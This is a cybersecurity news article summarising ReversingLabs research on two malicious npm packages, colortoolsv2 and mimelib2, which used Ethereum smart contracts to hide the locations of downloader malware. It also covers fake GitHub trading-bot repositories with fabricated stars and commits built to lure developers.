Crypto as a Weapon: Malicious npm Packages Use Ethereum Smart Contracts for C2
Ddos 
Researchers from ReversingLabs have discovered two malicious npm packages leveraging Ethereum smart contracts to conceal and deliver malware. The packages—colortoolsv2 and mimelib2—were identified in July 2025 and represent a new tactic in the ongoing battle over open source security.
The campaign began with the publication of colortoolsv2 on July 7. Shortly after its removal from npm, attackers replaced it with a nearly identical package named mimelib2, which contained the same malicious code. As the researchers explain, “the two npm packages abused smart contracts to conceal malicious commands that installed downloader malware on compromised systems.”
Both packages were designed to masquerade as utility libraries but contained only the files necessary for their malicious purpose. Unlike legitimate npm tools, no effort was made to make them look useful; instead, the attackers focused their attention on creating the illusion of legitimacy through GitHub repositories that appeared trustworthy.
Traditionally, malicious npm packages fetch second-stage malware from hardcoded URLs, making it possible for defenders to identify suspicious strings during source code review. However, ReversingLabs noted that “what is new and different is the use of Ethereum smart contracts to host the URLs where malicious commands are located downloading the second stage malware.”
Ethereum smart contracts—public, decentralized programs that execute automatically—were repurposed as covert command-and-control (C2) servers. By embedding malicious commands within a smart contract, the attackers ensured their infrastructure was resilient and far harder to take down than a traditional server.
This method reflects a growing trend. As the report recalls, “back in 2023, we observed a similar pattern of behavior among Python packages that contained a Base64 encrypted URL pointing to a secret GitHub Gist designed to execute the download of malicious code.” Smart contracts represent the latest evolution of this tactic.
Beyond npm, the attackers invested significant resources into GitHub-based deception. For example, the solana-trading-bot-v2 repository appeared to be a popular cryptocurrency trading tool with thousands of commits, active contributors, and numerous stars. In reality, as the researchers found, “all of these details were fabricated.”
- Dozens of accounts, created around the same time in July, starred and forked the repository, yet most contained nothing more than a “Hi there” README file.
- The project’s thousands of commits consisted largely of trivial file changes, such as repetitive creation and deletion of LICENSE files, to simulate ongoing development.
- The user slunfuedrac was identified as the account responsible for adding colortoolsv2 and later mimelib2 into the project’s dependencies.
Other repositories like ethereum-mev-bot-v2, arbitrage-bot, and hyperliquid-trading-bot were also implicated, following the same pattern of fake activity to lure developers.
By combining social engineering (fake GitHub credibility) with technical novelty (Ethereum smart contracts as C2), they raise the bar for defenders. Developers relying on open source code cannot afford to evaluate projects solely on superficial trust signals like stars, forks, or commit counts. ReversingLabs researchers warn, “it highlights the fast evolution of detection evasion strategies by malicious actors who are trolling open source repositories and developers.”
Related Posts:
- New Golang Backdoor Employs Telegram for Command and Control
- Malicious Python Packages Exploited Gmail as Covert Command-and-Control Channels
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
